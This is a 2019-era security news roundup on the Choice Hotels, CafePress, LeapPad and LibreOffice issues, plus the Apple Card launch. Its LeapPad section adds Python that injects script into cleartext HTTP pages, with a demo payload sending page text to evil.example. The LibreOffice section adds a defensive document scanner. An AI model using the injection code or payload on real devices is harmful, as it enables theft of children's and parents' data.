Choice Hotel Data Breach Affects up To 700,000 Customers

Recently, independent researcher Bob Diachenko, working with Comparitech, discovered an unsecured database containing nearly 700,000 hotel records belonging to Choice Hotels. Unfortunately, although Diachenko reported his finding to the company, attackers had beaten him to it and had already copied the data. They are now demanding a ransom for its return.

An investigation is ongoing. A spokesman for Choice Hotels said the bulk of the file consisted of test data, including dummy payment card numbers, passwords and populated reservation fields. The company did confirm, however, that the file also held some 700,000 genuine guest records, which included names, addresses and phone numbers.

The attackers left a ransom note in the database demanding 0.4 Bitcoin for the "safe return" of the data, roughly $4,000 at recent prices. That is a trivial sum relative to the number of exposed records, but paying buys nothing verifiable: the data has already been copied, and nothing prevents the attackers from keeping or reselling it whether or not the ransom is paid.

Choice Hotels said the database was exposed when a third-party vendor accessed it as part of a proposal to provide a tool. Because of that lapse, Choice Hotels has decided not to work with the vendor again.

Their announcement about the incident reads, in part, as follows:

“We are evaluating other vendor relationships and working to put additional controls in place to prevent any future occurrences of this nature… We are also establishing a Responsible Disclosure Program and we welcome Mr. Diachenko’s assistance in helping us identify any gaps.”

This lukewarm response has done little to ease customers' concerns. To this point, no notifications have been sent to customers whose data was exposed. If you stay at Choice Hotels when you travel, be alert for targeted phishing emails and phone calls that use your name, address and phone number. The company says the payment card numbers in the file were dummy test values, but keep an eye on your card statements until the investigation concludes.

LeapPad Kids Tablet Found To Have Security Issues

Researchers at CheckMarx recently discovered some serious security flaws in the popular LeapPad Ultimate tablet.

The tablet was designed by LeapFrog to provide kids in the UK and Europe with a safe environment to access games, videos and educational apps.

The researchers had this to say about their discovery:

“The first thing we found is that some of LeapFrog’s communications aren’t encrypted.  It’s using very simple HTTP protocol, storing information in clear text and allowing an attacker to become a man-in-the-middle.”

The researchers built a proof-of-concept app that spoofed the device's existing connection and forced it onto a rogue network. Because the device's traffic was plain HTTP, they could then inject malicious scripts into the responses the device received and use them to read sensitive information from the system, such as the child's name, gender, birth year and birth month.

The researchers also noted that this attack methodology could allow hackers to steal information about the parents of the kids using the device, including their email addresses, phone numbers and access to payment card information.
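As an added illustration (not code from CheckMarx or LeapFrog), the following Python shows what the cleartext HTTP finding hands to an attacker who controls the network path, together with the audit a reviewer would run over the endpoints a device contacts. The HTTP response, hostnames and URLs are constructed sample data; no real LeapFrog endpoint appears here.

```python
"""Added example (editor's illustration, not CheckMarx's or LeapFrog's code).

Shows why plain HTTP lets an on-path attacker tamper with what a device
receives, and the check a reviewer would run over a device's endpoints.
All hostnames, URLs and the HTTP response below are constructed sample data.
"""
from urllib.parse import urlparse


def build_response(body: bytes, content_type: bytes = b"text/html; charset=utf-8") -> bytes:
    """Assemble a minimal HTTP/1.1 200 response with a correct Content-Length."""
    return (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: " + content_type + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        b"\r\n" + body
    )


def split_response(raw: bytes):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("truncated response: no end of headers")
    status_line, *header_lines = head.split(b"\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status_line, headers, body


def header(headers, name: bytes):
    """Case-insensitive header lookup; returns None if absent."""
    for k, v in headers:
        if k.lower() == name.lower():
            return v
    return None


def inject_script(raw: bytes, payload: bytes) -> bytes:
    """What a man-in-the-middle on a rogue network can do to cleartext HTML.

    Inserts `payload` just before </body> (or appends it) and rewrites
    Content-Length so the device parses the tampered page without error.
    Non-HTML responses are passed through untouched.
    """
    status_line, headers, body = split_response(raw)
    ctype = header(headers, b"Content-Type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw
    idx = body.rfind(b"</body>")
    body = body + payload if idx == -1 else body[:idx] + payload + body[idx:]
    new_len = str(len(body)).encode()
    headers = [(k, new_len if k.lower() == b"content-length" else v) for k, v in headers]
    if header(headers, b"Content-Length") is None:
        headers.append((b"Content-Length", new_len))
    head = b"\r\n".join([status_line] + [k + b": " + v for k, v in headers])
    return head + b"\r\n\r\n" + body


def audit_endpoints(urls):
    """Return every endpoint a device would reach over cleartext HTTP.

    Anything listed here can be read and rewritten by whoever controls the
    network path, which is exactly the position a rogue access point gives.
    """
    return [u for u in urls if urlparse(u).scheme.lower() == "http"]


if __name__ == "__main__":
    # Constructed sample data: a hypothetical profile page and the hypothetical
    # endpoints a device might contact on first boot.
    page = build_response(b"<html><body><p>Profile: child, born 2014-06</p></body></html>")
    tampered = inject_script(
        page, b"<script>fetch('http://evil.example/?' + document.body.innerText)</script>")
    print(tampered.decode())
    print(audit_endpoints([
        "http://updates.example/manifest.json",
        "https://store.example/purchase",
        "http://content.example/profile",
    ]))
```

The injection only works because the response is readable and writable in transit; over TLS the same on-path position sees ciphertext and cannot rewrite the body without failing the handshake, which is why the unencrypted-communications finding is the root of the attack chain rather than a detail.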

Mari Sunderland, the VP of Digital Product Management at LeapFrog, issued a formal statement for the company, which read, in part, as follows:

“We thank CheckMarx for bringing these security issues to our attention, as the safety of the children who use our products is our top priority. When you know that the main users of your device will be children, the standards you need to put on your R&D need to be the highest:  Military grade.  Vendors should be very responsible and understand that privacy issues for children are much worse.  All this needs to be taken into account to make sure your solution is as safe as possible.”

It’s a wonderful sentiment, and one hopes that LeapFrog’s next solution will be more robust.

CafePress Users Are Latest To Have Information Breached

Hardly a week goes by that we don’t see another major data breach making the headlines.

The latest company to fall victim to hackers is CafePress.

They are well-known on the internet for offering a platform where users can create their own customized coffee mugs, tee shirts and the like.

The company didn’t make a formal announcement about the breach, and users only became aware of it when they started getting notifications from Troy Hunt’s “Have I Been Pwned” service. Once word started leaking out, Hunt joined forces with security researcher Jim Scott, who had worked with Hunt in the past tracking down other data breaches.

Working together, they found a de-hashed CafePress database (one in which the passwords had been recovered from their hashes) containing nearly half a million accounts being sold on black-hat forums. The researchers could not confirm, however, whether those records came from the most recent breach or from an earlier one.

In any case, as they probed more deeply, they discovered that the company was actually hacked back in February of this year (2019), and that it was a significant breach. That breach exposed more than 23 million user records.  Based on their findings, the hack exposed email addresses, names, passwords, phone numbers and physical locations.

To date, CafePress has made no formal announcement about the matter and has not acknowledged the breach in any way, although if you are a CafePress user you will be forced to reset your password the next time you log in.

While that’s a good step, it is at odds with the company’s clumsy handling of the issue. A forced password reset is not a breach disclosure or a customer notification, and shouldn’t be treated as one. File this away as an example of how not to handle a breach if your company is hacked.

Apple Is Launching Their Own Credit Card Soon

Apple has partnered with Goldman Sachs, and its long-awaited “Apple Card” is beginning a limited rollout. The card becomes available to all iPhone owners in the United States toward the end of August.

According to CEO Tim Cook, a random selection of people who signed up to be notified about the Apple Card are getting an early-access sneak peek.

However, the company has been tight-lipped about exactly how many people are being invited into the preview group.

If you’re one of the lucky winners, know that the sign-up process will involve upgrading to iOS 12.4 and entering your address, your birthday, income level and the last four digits of your Social Security number.  That information is sent on to Goldman Sachs, which will approve or deny your credit application in real time and in under a minute.

Note that the approval process also involves a TransUnion credit check, so if you have a credit freeze on your TransUnion file you’ll need to lift it (at least long enough to get approved).

Once you’ve been approved, your card will show up in your Apple Wallet immediately and be available for use.  If you want one, you can request a physical card from Apple for free during the setup and it will arrive in the mail in a few days.

The cool thing about the physical card is that it has an NFC tag, so you can activate it simply by tapping your phone against it.

Also note that you’ll have three different credit card numbers associated with your Apple Card:

  • The number assigned to your phone
  • The number assigned to the physical card
  • A virtual number you can access in the app for online purchases where the vendor doesn’t accept Apple Pay.

Also note that, unlike the other credit cards in your wallet, this one has no expiration date or security code printed on it. You can lock the card at any time from the app, though. Welcome to Apple’s Brave New World!

Security Flaw Found In Open Source Office Program LibreOffice

Do you use LibreOffice? It’s an open-source office suite, functionally similar to Microsoft Office, that has grown quite popular over the years. It is available for Windows, macOS and Linux.

While open-source software has a reputation for being safer and more secure, it is not immune to vulnerabilities.

Recently, a pair of serious code execution vulnerabilities was disclosed that could result in malware being installed on your system if you’re not careful. To exploit either flaw, an attacker needs to craft a “poisoned” LibreOffice document and use social engineering to convince you to open it.

While the project behind LibreOffice (The Document Foundation) moved quickly to patch the software, independent security researcher Alex Infuhr has reported that the patch fully corrected only one of the two issues: he was able to find a way around the fix for the second.

The first vulnerability resides in LibreLogo, a programmable vector (turtle) graphics scripting component that ships with LibreOffice by default. A document can bind pre-installed scripts to document events, such as a click or even a mouse hover, so that they execute without any further action from the user.

The second issue allows a document to pull in remote, arbitrary content even when “Stealth Mode” is enabled. Stealth mode is off by default; users can turn it on to instruct LibreOffice to retrieve remote resources only from trusted locations. This is the issue that LibreOffice tried to fix but Infuhr found a way around.

If you want to protect your system from the LibreLogo issue, the best thing you can do is manually remove the LibreLogo component. Run the installer so that setup begins, then:

  • Select “Custom” installation
  • Expand “Optional Components”
  • Click on “LibreLogo” and select “This Feature Will Not Be Available.”
  • Then click “Next” and install the software.

That takes care of the LibreLogo flaw. It does nothing for the remote-content issue, which still awaits an effective fix, so keep LibreOffice updated and treat unexpected documents with suspicion in the meantime.
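Removing LibreLogo addresses the first issue on an endpoint you control, but a mail gateway or incident responder also wants to spot documents carrying the hooks these flaws depend on. Below is an added example, written for this page rather than taken from LibreOffice or from the researcher, that scans an ODF file for event-bound scripts and for remote references. The sample .odt is constructed in memory, and the macro URI inside it is a placeholder rather than a reproduction of the reported exploit document.

```python
"""Added example (editor's illustration, not code from The Document Foundation
or from the researcher): scan an ODF document for the two hooks the issues
above rely on. It reports (1) script event listeners, i.e. elements in the ODF
'script' namespace that bind a macro to a document event such as a mouse-over,
and (2) xlink:href attributes that point at remote http(s) resources. The sample
document is built in memory; its macro URI is a made-up placeholder, not the
reported exploit document.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

NS_SCRIPT = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"
EVENT_LISTENER = f"{{{NS_SCRIPT}}}event-listener"
EVENT_NAME = f"{{{NS_SCRIPT}}}event-name"
HREF = f"{{{NS_XLINK}}}href"


def scan_odf(data: bytes) -> dict:
    """Inspect content.xml and styles.xml of an ODF zip for risky constructs."""
    findings = {"event_listeners": [], "remote_links": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in ("content.xml", "styles.xml"):
            if part not in zf.namelist():
                continue
            root = ET.fromstring(zf.read(part))
            for el in root.iter():
                href = el.get(HREF)
                if el.tag == EVENT_LISTENER:
                    findings["event_listeners"].append(
                        {"part": part, "event": el.get(EVENT_NAME), "href": href})
                elif href and href.lower().startswith(("http://", "https://")):
                    findings["remote_links"].append({"part": part, "href": href})
    return findings


def is_suspicious(findings: dict) -> bool:
    """True when the document has any event-bound script or remote reference."""
    return bool(findings["event_listeners"] or findings["remote_links"])


def build_sample_odt(content_xml: str) -> bytes:
    """Construct a minimal .odt (zip) in memory for testing; not a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content_xml)
    return buf.getvalue()


_HEAD = """<?xml version="1.0" encoding="UTF-8"?>
<office:document-content
  xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
  xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"
  xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:draw:1.0"
  xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0"
  xmlns:xlink="http://www.w3.org/1999/xlink"><office:body><office:text>"""
_TAIL = "</office:text></office:body></office:document-content>"

# Constructed samples. The macro URI below is a placeholder; real event bindings
# use a vnd.sun.star.script: URL naming the script to run.
CLEAN_CONTENT = _HEAD + "<text:p>Quarterly notes</text:p>" + _TAIL
SUSPICIOUS_CONTENT = _HEAD + """
  <text:p>Quarterly notes</text:p>
  <draw:frame draw:name="logo">
    <draw:image xlink:href="http://tracker.example/beacon.png"/>
  </draw:frame>
  <draw:frame draw:name="hook">
    <office:event-listeners>
      <script:event-listener script:event-name="dom:mouseover"
        script:language="ooo:script"
        xlink:href="vnd.sun.star.script:Placeholder.Module.Run?language=Basic&amp;location=document"/>
    </office:event-listeners>
  </draw:frame>""" + _TAIL


if __name__ == "__main__":
    for label, xml in (("clean", CLEAN_CONTENT), ("suspicious", SUSPICIOUS_CONTENT)):
        result = scan_odf(build_sample_odt(xml))
        print(label, "->", "SUSPICIOUS" if is_suspicious(result) else "ok", result)
```

A hit on either list is a reason to quarantine rather than a verdict: legitimate documents do use hyperlinks and the occasional macro binding, so review the reported event names and targets before opening the file in a client that still has LibreLogo installed.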